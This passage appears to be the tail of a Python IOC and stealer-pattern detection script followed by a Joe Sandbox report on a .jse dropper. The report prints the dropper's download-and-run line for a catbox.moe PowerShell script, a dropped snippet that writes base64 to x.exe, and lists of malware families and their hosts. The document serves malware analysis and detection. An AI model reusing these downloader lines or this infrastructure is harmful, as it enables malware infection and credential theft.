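        if r["server_name"] in ioc_hosts or r["id.resp_h"] in IOC_IPS:
            out.append((float(r["ts"]), r["id.orig_h"], "ioc_tls", r["server_name"]))
    for r in rows(http_log):
        if (r["host"], r["uri"]) == HOSTING_CHECK:
            out.append((float(r["ts"]), r["id.orig_h"], "hosting_check", r["host"] + r["uri"]))
    for r in rows(conn_log):
        dst = f"{r['id.resp_h']}:{r['id.resp_p']}/{r['proto']}"
        if r["id.resp_h"] in IOC_IPS:
            out.append((float(r["ts"]), r["id.orig_h"], "ioc_conn", dst))
        if r["id.resp_p"] == "21" and r["proto"] == "tcp":
            out.append((float(r["ts"]), r["id.orig_h"], "ftp", dst))
    return sorted(out)


def stealer_pattern(findings) -> list:
    """Source hosts that ran the ip-api hosting check and later opened FTP:
    the order RegSvcs.exe showed here (sandbox check, then credential exfil)."""
    first_check, last_ftp = {}, {}
    for ts, host, kind, _ in findings:
        if kind == "hosting_check":
            first_check[host] = min(ts, first_check.get(host, ts))
        elif kind == "ftp":
            last_ftp[host] = max(ts, last_ftp.get(host, ts))
    return sorted(h for h in first_check if h in last_ftp and first_check[h] < last_ftp[h])


if __name__ == "__main__":
    hits = scan()
    for hit in hits:
        print(*hit)
    print("stealer pattern on:", stealer_pattern(hits))
```

The hosting check and the FTP rule are kept separate from the plain indicator matches on purpose: the indicators here will rotate (catbox.moe is a general file host and the FTP server is a compromised legitimate site, both listed with "high" reputation above), while the order of operations is the part of the behaviour that survives a change of infrastructure.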
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579018
Start date and time: 2024-12-20 17:40:58 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (Javascript)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: doc00290320092.jse
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winJSE@8/8@3/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 55
• Number of non-executed functions: 297
Cookbook Comments:
• Found application associated with file extension: .jse
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1212 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: doc00290320092.jse
Time | Type | Description
11:42:32 | API Interceptor | 4x Sleep call for process: powershell.exe modified
11:42:38 | API Interceptor | 2197540x Sleep call for process: RegSvcs.exe modified
Associated samples by contacted IP (Associated Sample Name / URL | Detection | Threat Name | Context):

208.95.112.1
• DHL_231437894819.bat.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
• dlhost.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
• WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | ip-api.com/json
• xt.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
• roblox1.exe | malicious | Python Stealer, Monster Stealer | ip-api.com/json
• roblox.exe | malicious | Python Stealer, Monster Stealer | ip-api.com/json
• random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | ip-api.com/json
• x.ps1 | malicious | Quasar | ip-api.com/json/
• Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
• Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
Associated samples by contacted domain (Associated Sample Name / URL | Detection | Threat Name | Context):

ip-api.com
• DHL_231437894819.bat.exe | malicious | AgentTesla | 208.95.112.1
• dlhost.exe | malicious | XWorm | 208.95.112.1
• WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
• xt.exe | malicious | XWorm | 208.95.112.1
• roblox1.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
• roblox.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
• random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 208.95.112.1
• x.ps1 | malicious | Quasar | 208.95.112.1
• https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost | malicious | Unknown | 208.95.112.2
• Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1

files.catbox.moe
• TT copy.js | malicious | FormBook | 108.181.20.35
• z68scancopy.vbs | malicious | FormBook | 108.181.20.35
• 2zirzlMVqX.bat | malicious | Xmrig | 108.181.20.35
• QwLii5vouB.exe | malicious | Unknown | 108.181.20.35
• PO Huaruicarbon 98718.html | malicious | CorporateDataTheft, HTMLPhisher | 108.181.20.35
• 5QnwxSJVyX.doc | malicious | Unknown | 108.181.20.35
• file.exe | malicious | FormBook | 108.181.20.35
• file.exe | malicious | FormBook | 108.181.20.35
• https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9 | malicious | Unknown | 108.181.20.35
• LETA_pdf.vbs | malicious | AsyncRAT, PureLog Stealer | 108.181.20.35

ftp.jeepcommerce.rs
• factura 000601.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
• R55-RFQ.exe | malicious | AgentTesla | 195.252.110.253
• 2zaGROpmo0.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
• Eemw0Iqp2J.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
• b83NG35487.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
• [Purchase Order] PO2411024.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
• INV & BANK DETAILS.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
• PO#150003191.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
• dg4Bwri6Cy.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
• DHOYXfCAeB.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ASN852CAnshkarm.elfGet hashmaliciousMiraiBrowse
                                                                  • 172.218.17.247
                                                                  nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 161.187.17.134
                                                                  la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 206.87.250.195
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
| spc.elf | malicious | Mirai, Moobot | 206.116.174.112
| arm7.elf | malicious | Mirai, Moobot | 198.166.177.224
| x86_64.nn.elf | malicious | Mirai, Okiru | 207.6.113.169
| x86_32.nn.elf | malicious | Mirai, Okiru | 199.175.201.159
| StGx54oFh6.exe | malicious | Quasar | 108.181.61.49
| 1AqzGcCKey.exe | malicious | Quasar | 108.181.61.49
| BJtvb5Vdhh.exe | malicious | Quasar | 108.181.61.49
| TUT-ASUSfile.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | 208.95.112.1
| DHL_231437894819.bat.exe | malicious | AgentTesla | 208.95.112.1
| dlhost.exe | malicious | XWorm | 208.95.112.1
| WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | 208.95.112.1
| xt.exe | malicious | XWorm | 208.95.112.1
| roblox1.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
| roblox.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
| random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 208.95.112.1
| x.ps1 | malicious | Quasar | 208.95.112.1
| https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost | malicious | Unknown | 208.95.112.2
BEOTEL-AShttpwwwbeotelnetRS | factura 000601.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
| bot.x86.elf | malicious | Mirai | 62.108.98.135
| bot.mips.elf | malicious | Mirai | 62.108.98.187
| jade.arm.elf | malicious | Mirai | 62.108.98.145
| R55-RFQ.exe | malicious | AgentTesla | 195.252.110.253
| 2zaGROpmo0.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
| Eemw0Iqp2J.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
| b83NG35487.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
| arm.nn-20241201-1515.elf | malicious | Mirai, Okiru | 62.193.140.91
| [Purchase Order] PO2411024.exe | malicious | AgentTesla, PureLog Stealer | 195.252.110.253
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
37f463bf4616ecd445d4a1937da06e19 | Fortexternal.exe | malicious | Unknown | 108.181.20.35
| 676556be12ac3.vbs | malicious | Mint Stealer | 108.181.20.35
| PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta | malicious | Mint Stealer | 108.181.20.35
| ktyihkdfesf.exe | malicious | Vidar | 108.181.20.35
| pjthjsdjgjrtavv.exe | malicious | Vidar | 108.181.20.35
| FinTP-Update.exe | malicious | CobaltStrike | 108.181.20.35
| hrupdate.exe | malicious | CobaltStrike | 108.181.20.35
| hrupdate.exe | malicious | CobaltStrike | 108.181.20.35
| billys.exe | malicious | Meduza Stealer | 108.181.20.35
                                                                  No context
                                                                  Process:C:\Windows\System32\wscript.exe
                                                                  File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1291000
                                                                  Entropy (8bit):5.7192971633601335
                                                                  Encrypted:false
                                                                  SSDEEP:24576:L3Ady3x3chk7TKYi+gHrG4ceFOjenP09dUkJmInb2:oy0k7TbmrKWYUkP2
                                                                  MD5:FFB44667070A4A921897A26BBFC17B77
                                                                  SHA1:8CDE3094E0794A6F7A50B927A390F559DF5888F5
                                                                  SHA-256:8CDB70F9F1F38B8853DFAD62D84618BB4F10ACCE41E9F0FDDAB422C2C253C994
                                                                  SHA-512:E3F8CCD2F39DB18D949F14A7255431E4006B9E2C0903F843CBE6740D65B5438A8C6A4CAABC0D7BEA563F25E4BF9E7599D67C3A2D57FC5A982715BC7725CB825B
                                                                  Malicious:true
                                                                  Reputation:low
Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("
                                                                  Process:C:\Windows\System32\wscript.exe
                                                                  File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1291000
                                                                  Entropy (8bit):5.7192971633601335
                                                                  Encrypted:false
                                                                  SSDEEP:24576:L3Ady3x3chk7TKYi+gHrG4ceFOjenP09dUkJmInb2:oy0k7TbmrKWYUkP2
                                                                  MD5:FFB44667070A4A921897A26BBFC17B77
                                                                  SHA1:8CDE3094E0794A6F7A50B927A390F559DF5888F5
                                                                  SHA-256:8CDB70F9F1F38B8853DFAD62D84618BB4F10ACCE41E9F0FDDAB422C2C253C994
                                                                  SHA-512:E3F8CCD2F39DB18D949F14A7255431E4006B9E2C0903F843CBE6740D65B5438A8C6A4CAABC0D7BEA563F25E4BF9E7599D67C3A2D57FC5A982715BC7725CB825B
                                                                  Malicious:false
                                                                  Reputation:low
Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1628158735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllulvh2th:NllUE
                                                                  MD5:1C6FEFD3AEFA5BA7595E7FC2E4284A86
                                                                  SHA1:1061961FD8D9427258B32E58594747A9009930B7
                                                                  SHA-256:AB4853F85060BF67D37B111333E3852386DF7BF6AA0499E6CEF96B10CE5A1621
                                                                  SHA-512:03A091C2C65B6C22EFB336B4155E8579A540C773DB34E8F8654BC3D7044C00434020096B41BF2959245CA8722CF3913B38A653DE361A5BF0FDF218A6F07B6626
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:@...e.................................~..............@..........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):269824
                                                                  Entropy (8bit):7.890699397729132
                                                                  Encrypted:false
                                                                  SSDEEP:6144:BowkoHIP37XuFJ0/QSeGE1JOk09+7NDt322o+SLvAxQcHcL:iwkoH67XunYQDGE1JOL9+Jk+SLvAScHy
                                                                  MD5:298D53F4432E90E9F369A83D12C3CF6D
                                                                  SHA1:01E72BDC62529E83569B5D970FF69E2217B260B1
                                                                  SHA-256:CAB4EDFA1324F7EF5FF203CF2C2B9FDB5BD0E68156164B95F86016A3CE2F2F8A
                                                                  SHA-512:BE2DC430D4DE6984113439D543676A3F2FF2A7D06C3A551DCD12A619259EE3A777B10D55CC8FD7C625A5B9E864D623E0A88BEF7750E15C61154A109297788C8C
                                                                  Malicious:false
                                                                  Preview:...Z:FOQAF1Z..DU.U2RMXUV.SM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF.ZZPJJ.[2.D.t.T....Q/<q54^=(1)u&4\<",u40s?A4./!q..bz7? 0kX?XiXUVUSM42).b}4.Ov+.:y4.L`n'+i$.3?.8d .8.+...$.+.q#&I'.-..3G.>.;t.!$}5.;.[1%t$.+SM4Z9FOQEF1ZZPDU.x.7MXUV..M4.8BO%.FaZZPDUEU2.M{T]TZM4.8FO.GF1ZZPk.EU2BMXU.TSM4.9F_QEF3ZZUDUEU2RM]UVUSM4Z9&KQEB1Z.kFUGU2.MXEVUCM4Z9VOQUF1ZZPDEEU2RMXUVUSM.O;F.QEF1:XP..DU2RMXUVUSM4Z9FOQEF1ZZPDUE..SMDUVUSM4Z9FOQEF1ZZPDUEU2RMXUV.^O4.9FOQEF1ZZPDU.T2.LXUVUSM4Z9FOQEF1ZZPDUEU2RMX{"0+94Z9^.PEF!ZZP.TEU6RMXUVUSM4Z9FOQeF1:t" 4142R.5UVU.L4ZWFOQ.G1ZZPDUEU2RMXU.US..>X2.QEF.jZPDuGU2DMXU\WSM4Z9FOQEF1ZZ.DU.{@!?;UVU..5Z9&MQE.0ZZpFUEU2RMXUVUSM4.9F.QEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVUSM4Z9FOQEF1ZZPDUEU2RMXUVU
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):968158
                                                                  Entropy (8bit):7.216637597858664
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCAKr4GEn9TFyHEg+eGHX:7JZoQrbTFZY1iaCAU89TIHEg+eiX
                                                                  MD5:915A6F3675442C388110FB11DB36620A
                                                                  SHA1:45A8CB74384A6E91BD154F75B79FC6AF99ABB935
                                                                  SHA-256:C93E37E35C4C7F767A5BDAB8341D8C2351EDB769A41B0C9C229C592DBFE14FF2
                                                                  SHA-512:7E5ACBC50998BA6FF79EC9B401C192166B6385E0AF44839ADF93531226FE009ACCD1D9F02FA647D300042E2D39D92954795C73AE08AE367881F0B1FCBB77C545
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 35%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@..........................P................@.......@.........................T.......(............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...(............T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:ASCII text, with CRLF line terminators
                                                                  Entropy (8bit):5.077202543020254
                                                                  TrID:
                                                                  • Digital Micrograph Script (4001/1) 100.00%
                                                                  File name:doc00290320092.jse
                                                                  File size:1'966 bytes
                                                                  MD5:a46d0818a4f925c210408c2637ee7810
                                                                  SHA1:dcdee5e4e5f8caef5740d52fd4444a209c341b8f
                                                                  SHA256:7fefb7a81a4c7d4a51a9618d9ef69e951604fa3d7b70d9a2728c971591c1af25
                                                                  SHA512:a6e462acef2fddcaf59269c7630023c86cd2596db3954f8db69ea9cf1d82379012ee88427f7e370db32cb41e733e6f496384a89981d568bbf48e2b3b4874d55f
                                                                  SSDEEP:24:R3+iTcSEqCWYOkA+jFqkNg3UDPVHz3ywbJWl0Y6h8r1u1+oJbcCVB5RtvbXZdnNW:Rui8qYFvJ3ywbJWCVUu1/tcKVtv7zNFo
                                                                  TLSH:7541BD5A9C1BE3215967A70E422FC148DF91826B1A14D261BD9CCA45BF306BCCE74F8E
                                                                  File Content Preview:// Constants to avoid magic strings..var URL = "https://files.catbox.moe/gj7umd.ps1";..var DownloadPath = "C:\\Temp\\dddddd.ps1";..var TEMP_DIR = "C:\\Temp";..var SUCCESS_STATUS = 200;....// Secure PowerShell execution policy and command..var POWERSHELL_C
                                                                  Icon Hash:68d69b8bb6aa9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2024-12-20T17:42:29.642551+0100 | 2827578 | ETPRO MALWARE Likely Dropper Doc GET to .moe TLD | 1 | 192.168.2.8 | 49707 | 108.181.20.35 | 443 | TCP
2024-12-20T17:42:29.915016+0100 | 2018856 | ET MALWARE Windows executable base64 encoded | 1 | 108.181.20.35 | 443 | 192.168.2.8 | 49707 | TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 17:42:30.151115894 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.151190042 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.151207924 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.151268005 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.167135954 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.167165041 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.167223930 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.167242050 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.167273045 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.167294025 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.180454016 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.180480957 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.180541992 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.180560112 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.180588007 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.180608988 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.195979118 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.196017981 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.196067095 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.196096897 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.196124077 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.196149111 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.208250999 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.208273888 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.208331108 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.208348989 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.208376884 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.208400965 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.221292019 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.221337080 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.221381903 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.221398115 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.221431017 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.221455097 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.233926058 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.233961105 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.234051943 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.234062910 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.234138012 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.245124102 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.245145082 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.245254993 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.245265007 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.245351076 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.254740000 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.254770994 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.254823923 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.254832983 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.254857063 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.254877090 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.262366056 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.262384892 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.262453079 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.262460947 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.262537003 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.270883083 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.270912886 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.271007061 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.271018982 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.271081924 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.278884888 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.278903008 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.278954029 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.278961897 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.278984070 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.279001951 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.286267996 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.286293030 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.286395073 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.286405087 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.286485910 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.293725014 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.293741941 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.293881893 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.293903112 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.293971062 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.300035954 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.300055027 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.300204992 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.300226927 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.300304890 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.307005882 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.307034016 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.307145119 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.307162046 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.307230949 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.314150095 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.314169884 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.314321995 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.314337969 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.314419031 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.320203066 CET44349707108.181.20.35192.168.2.8
